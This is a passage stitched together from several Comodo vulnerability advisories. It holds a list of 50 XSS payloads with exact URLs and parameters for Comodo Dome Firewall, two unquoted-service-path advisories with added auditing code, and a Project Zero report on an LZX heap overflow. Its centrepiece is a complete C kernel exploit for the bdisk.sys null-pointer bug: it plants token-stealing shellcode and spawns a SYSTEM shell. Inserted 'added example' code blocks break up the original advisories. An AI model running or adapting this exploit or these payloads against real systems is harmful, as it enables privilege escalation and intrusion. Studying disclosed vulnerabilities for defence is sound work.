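    """Combine the two conditions that make DragonUpdater exploitable: an
    unquoted path with spaces AND a high-privilege service account."""
    f = parse_sc_qc(sc_output)
    account = f.get("SERVICE_START_NAME", "")
    lookups = unquoted_path_candidates(f.get("BINARY_PATH_NAME", ""))
    return {
        "service": f.get("SERVICE_NAME"),
        "account": account,
        "unquoted": bool(lookups),
        "lookups": lookups,
        "runs_as_system": account.lower() in ("localsystem", r"nt authority\system"),
    }


# Copy of the advisory's `sc qc DragonUpdater` output, used as sample input.
SC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DragonUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Dragon Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    print(audit_service(SC_OUTPUT))
```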
Additional notes :
Fixed in version 52.15.25.664
https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html
Vulnerability Disclosure Timeline:
=========================
24/09/2016 - Contact With Vendor
26/09/2016 - Vendor Response
03/10/2016 - Release Fixed Version
##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################
Introduction
Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.
Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/korugan/login
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
https://192.168.2.200:10443/korugan/admin_profiles
METHOD
Post
PARAMETER
comment
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
admin_name
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
surname
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
https://192.168.2.200:10443/korugan/license_activation
METHOD
Post
PARAMETER
newLicense
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/korugan/cmclient
METHOD
Post
PARAMETER
organization
PAYLOAD
"><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/korugan/backupschedule
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
https://192.168.2.200:10443/korugan/netwizard2
METHOD
Post
PARAMETER
netmask_addr
PAYLOAD
<script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
https://192.168.2.200:10443/korugan/routing
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
source
PAYLOAD
<script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/korugan/dhcp
METHOD
Post
PARAMETER
GATEWAY_GREEN
PAYLOAD
<script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/korugan/time
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
<script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users
METHOD
Post
PARAMETER
MACADDRESSES
PAYLOAD
<script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
<script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
<script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/korugan/fwgroups
METHOD
Post
PARAMETER
FWADDRESSES
PAYLOAD
<script>alert(20)</script>
#################################################################################
XSS21 | Stored
URL
https://192.168.2.200:10443/korugan/schedule
METHOD
Post
PARAMETER
SCHNAME
PAYLOAD
<script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
port
PAYLOAD
<script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
<script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
mac
PAYLOAD
<script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(25)</script>
#################################################################################
XSS26 | Stored
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(27)</script>
#################################################################################
XSS28 | Stored
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
<script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
<script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
<script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
<script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
<script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
<script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
<script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
https://192.168.2.200:10443/korugan/https_exceptions
METHOD
Post
PARAMETER
EXCEPTIONSITELIST
PAYLOAD
<script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
https://192.168.2.200:10443/korugan/smtpconfig
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
<script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
<script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
<script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_WHITELIST
PAYLOAD
<script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_BLACKLIST
PAYLOAD
<script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
remotenets
PAYLOAD
<script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
explicitroutes
PAYLOAD
<script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
static_ip
PAYLOAD
<script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_dns
PAYLOAD
<script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_domain
PAYLOAD
<script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_NETWORKS
PAYLOAD
<script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_DNS
PAYLOAD
<script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/korugan/vpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(50)</script>
#################################################################################
# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
# Date: 03/10/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
# Version: Software Version <= 52.15.25.664
# Tested on: Windows 7 x86/x64
1. Description
Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc ChromodoUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ChromodoUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Chromodo Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt requires the local attacker to insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
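The check the proof of concept above performs by hand can be automated. The following is an added example, not code from the advisory or from Comodo: it parses the text `sc qc` prints, flags a service whose BINARY_PATH_NAME is unquoted and contains a space while SERVICE_START_NAME is LocalSystem, and produces the quoted path the service should be configured with instead. The first sample is the advisory's own `sc qc` output; the second (ExampleSvc) is constructed.

```cpp
#include <cctype>
#include <iostream>
#include <map>
#include <string>

// Audit record for one service, built from the fields `sc qc` prints.
struct ServiceAudit {
    std::string name;             // SERVICE_NAME
    std::string binary_path;      // BINARY_PATH_NAME exactly as configured
    bool runs_as_system = false;  // SERVICE_START_NAME is LocalSystem
    bool unquoted_with_spaces = false;
    std::string fixed_path;       // quoted form the service should be configured with
};

static std::string trim(const std::string& s) {
    size_t b = 0, e = s.size();
    while (b < e && std::isspace(static_cast<unsigned char>(s[b]))) ++b;
    while (e > b && std::isspace(static_cast<unsigned char>(s[e - 1]))) --e;
    return s.substr(b, e - b);
}

// Turns "KEY : value" lines into a map. Keys never contain ':', so the first
// colon ends the key even when the value is a drive path such as "C:\...".
// Lines without a colon (the "[SC] QueryServiceConfig SUCCESS" banner) are skipped.
std::map<std::string, std::string> parse_sc_qc(const std::string& text) {
    std::map<std::string, std::string> fields;
    size_t start = 0;
    while (start < text.size()) {
        size_t nl = text.find('\n', start);
        if (nl == std::string::npos) nl = text.size();
        std::string line = text.substr(start, nl - start);
        start = nl + 1;
        size_t colon = line.find(':');
        if (colon == std::string::npos) continue;
        fields[trim(line.substr(0, colon))] = trim(line.substr(colon + 1));
    }
    return fields;
}

// Index just past the image name: after the first ".exe" (any case) when the
// command line carries arguments, otherwise the end of the string.
static size_t image_end(const std::string& p) {
    std::string lower(p);
    for (char& c : lower) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    size_t pos = lower.find(".exe");
    return pos == std::string::npos ? p.size() : pos + 4;
}

ServiceAudit audit_service(const std::map<std::string, std::string>& f) {
    auto get = [&f](const char* key) {
        auto it = f.find(key);
        return it == f.end() ? std::string() : it->second;
    };
    ServiceAudit a;
    a.name = get("SERVICE_NAME");
    a.binary_path = get("BINARY_PATH_NAME");
    a.runs_as_system = get("SERVICE_START_NAME") == "LocalSystem";
    a.fixed_path = a.binary_path;
    if (!a.binary_path.empty() && a.binary_path[0] != '"') {
        size_t end = image_end(a.binary_path);
        std::string image = a.binary_path.substr(0, end);
        // A space inside an unquoted image path is what lets the command line
        // be resolved to a shorter, unintended file name before the real one.
        a.unquoted_with_spaces = image.find(' ') != std::string::npos;
        a.fixed_path = "\"" + image + "\"" + a.binary_path.substr(end);
    }
    return a;
}

// The advisory's finding: unquoted, space-containing path AND LocalSystem.
bool is_unquoted_system_service(const ServiceAudit& a) {
    return a.unquoted_with_spaces && a.runs_as_system;
}

// Sample input: the `sc qc ChromodoUpdater` output quoted in the advisory.
const char* const kChromodoSample =
    "[SC] QueryServiceConfig SUCCESS\n"
    "SERVICE_NAME: ChromodoUpdater\n"
    "        TYPE               : 10  WIN32_OWN_PROCESS\n"
    "        START_TYPE         : 2   AUTO_START\n"
    "        BINARY_PATH_NAME   : C:\\Program Files\\Comodo\\Chromodo\\chromodo_updater.exe\n"
    "        LOAD_ORDER_GROUP   :\n"
    "        DISPLAY_NAME       : COMODO Chromodo Update Service\n"
    "        SERVICE_START_NAME : LocalSystem\n";

// Constructed sample (not from the advisory): a quoted path with arguments, i.e. the corrected shape.
const char* const kQuotedSample =
    "SERVICE_NAME: ExampleSvc\n"
    "        BINARY_PATH_NAME   : \"C:\\Program Files\\Example\\svc.exe\" -run\n"
    "        SERVICE_START_NAME : LocalSystem\n";

int main() {
    const char* const samples[] = {kChromodoSample, kQuotedSample};
    for (const char* sample : samples) {
        ServiceAudit a = audit_service(parse_sc_qc(sample));
        std::cout << a.name << ": " << (is_unquoted_system_service(a) ? "unquoted path, runs as SYSTEM" : "ok")
                  << "\n  configured: " << a.binary_path << "\n  should be : " << a.fixed_path << "\n";
    }
    return 0;
}
```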
Additional notes :
Fixed in version 52.15.25.665
https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html
Vulnerability Disclosure Timeline:
=========================
03/10/2016 - Contact With Vendor
03/10/2016 - Vendor Response
05/10/2016 - Release Fixed Version
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit, had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below is from Windows XP, in the IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48h + 38h = 80h if ESI is null
*/
#include <stdio.h>
#include <string.h>   /* memset, memcpy */
#include <conio.h>    /* getch */
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // Windows XP
if (minVersion == 1 && majVersion == 6) v = 2; // Windows 7
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occurred while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occurred while writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=737
Lzx_Decoder::init() initializes the vector Lzx_Decoder->window to a fixed size of 2^method bytes, which is then used during Lzx_Decoder::Extract(). It's possible for LZX compressed streams to exceed this size. Writes to the window buffer are bounds checked, but only after the write is completed.
The code is probably something like:
window[++window_pos] = foo;
if (window_pos > window.size())
return false;
This means the overflow still occurs, resulting in memory corruption, and the corruption can be triggered multiple times, since a single scan can contain multiple LZX compressed blobs. Scanning the attached testcase with page heap enabled results in the following error:
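The check-after-write pattern the report reconstructs, modelled as an added example (not Comodo's code): the window sits in front of a canary-filled guard region so the bytes the vulnerable writer stores past the end can be counted instead of corrupting heap metadata, and the hardened writer beside it checks the index before storing and rejects index == window.size(). The decoder, stream contents and sizes are constructed.

```cpp
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <vector>

constexpr uint8_t kCanary = 0xCC;  // fill pattern for the guard region
constexpr size_t kGuard = 16;      // bytes of guard after the window

// The decoder window plus a guard region, so that an out-of-bounds store can
// be observed as a changed canary instead of corrupting real heap metadata.
struct WindowModel {
    std::vector<uint8_t> backing;  // [0, window_size) is the window, then the guard
    size_t window_size;
    size_t window_pos = 0;
    explicit WindowModel(unsigned method)
        : backing((size_t(1) << method) + kGuard, 0), window_size(size_t(1) << method) {
        for (size_t i = window_size; i < backing.size(); ++i) backing[i] = kCanary;
    }
};

// Vulnerable form, as reconstructed in the report: the byte is stored first and
// the bound tested afterwards, so the store at index window_size has already
// happened, and one more slips through because the test uses '>' not '>='.
bool put_check_after(WindowModel& m, uint8_t b) {
    uint8_t* window = m.backing.data();
    window[++m.window_pos] = b;  // may land in the guard region
    if (m.window_pos > m.window_size) return false;
    return true;
}

// Hardened form: test the index about to be written, before writing, and treat
// index == window_size as out of bounds.
bool put_check_before(WindowModel& m, uint8_t b) {
    if (m.window_pos + 1 >= m.window_size) return false;
    m.backing[++m.window_pos] = b;
    return true;
}

struct Outcome {
    size_t accepted;         // input bytes the writer accepted
    size_t guard_corrupted;  // canary bytes overwritten past the window
};

size_t guard_bytes_corrupted(const WindowModel& m) {
    size_t n = 0;
    for (size_t i = m.window_size; i < m.backing.size(); ++i)
        if (m.backing[i] != kCanary) ++n;
    return n;
}

// Feeds a constructed stream of stream_len literal bytes (longer than the window
// to model an over-long LZX stream) through one of the writers. The pre-increment
// from the report's snippet is kept, so index 0 is never used and a 2^method
// window holds 2^method - 1 literals.
Outcome decode_literals(bool hardened, unsigned method, size_t stream_len) {
    WindowModel m(method);
    std::vector<uint8_t> stream(stream_len, 0x41);  // constructed input
    size_t accepted = stream.size();
    for (size_t i = 0; i < stream.size(); ++i) {
        bool ok = hardened ? put_check_before(m, stream[i]) : put_check_after(m, stream[i]);
        if (!ok) { accepted = i; break; }
    }
    return Outcome{accepted, guard_bytes_corrupted(m)};
}

int main() {
    Outcome v = decode_literals(false, 4, 20);  // 16-byte window, 20-byte stream
    Outcome h = decode_literals(true, 4, 20);
    std::cout << "check after write : accepted " << v.accepted
              << ", bytes stored past the window " << v.guard_corrupted << "\n";
    std::cout << "check before write: accepted " << h.accepted
              << ", bytes stored past the window " << h.guard_corrupted << "\n";
    return 0;
}
```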
(918.644): Unknown exception - code 000006ba (first chance)
===========================================================
VERIFIER STOP 000000000000000F: pid 0x918: corrupted suffix pattern
0000000040C71000 : Heap handle
0000000040F76FE0 : Heap block
0000000000010018 : Block size
0000000040F86FF8 : corruption address
===========================================================
> lmv munarch
start end module name
000007fe`f44c0000 000007fe`f4562000 unarch (export symbols) C:\Program Files\COMODO\COMODO Internet Security\scanners\unarch.cav
Loaded symbol image file: C:\Program Files\COMODO\COMODO Internet Security\scanners\unarch.cav
Image path: C:\Program Files\COMODO\COMODO Internet Security\scanners\unarch.cav
Image name: unarch.cav
Timestamp: Mon Dec 29 04:52:14 2014 (54A14E7E)
CheckSum: 000AC529
ImageSize: 000A2000
File version: 6.2.15068.1057
Product version: 6.2.15068.1057
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04e4
CompanyName: COMODO
ProductName: COMODO Antivirus Scan Engine
ProductVersion: 6, 2, 342748, 1057
FileVersion: 6, 2, 342748, 1057
FileDescription: COMODO Antivirus Scan Engine
